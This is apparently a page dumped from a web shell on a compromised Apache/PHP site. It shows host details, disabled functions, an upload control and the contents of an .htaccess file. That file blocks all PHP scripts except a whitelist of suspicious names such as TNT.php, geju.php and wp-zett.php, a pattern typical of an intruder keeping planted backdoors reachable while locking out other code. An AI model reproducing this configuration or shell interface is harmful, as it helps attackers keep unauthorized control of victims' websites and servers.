HEX
Server: Apache
System: Linux h2web400 6.1.0-0.deb11.21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1~bpo11+1 (2024-05-06) x86_64
User: uid65189 (65189)
PHP: 8.0.30
Disabled: passthru,exec,system,popen,shell_exec,proc_open,pcntl_exec
Upload Files
File: /home/clients/96e9f2feb54fb0055eef72f432e62621/web/newway-ortho/.htaccess
<FilesMatch ".*\.(phtml|php|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|geju.php|plugin-install.php|cong.php|about.php|fun.php|wp-admin.php|TNT.php|rasse.php|wander.php|bak.php|wp-login.php|a.php|wp-zett.php|LV.php|content.php|mar.php|87.php|)$">
Order Allow,Deny
Allow from all
</FilesMatch>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>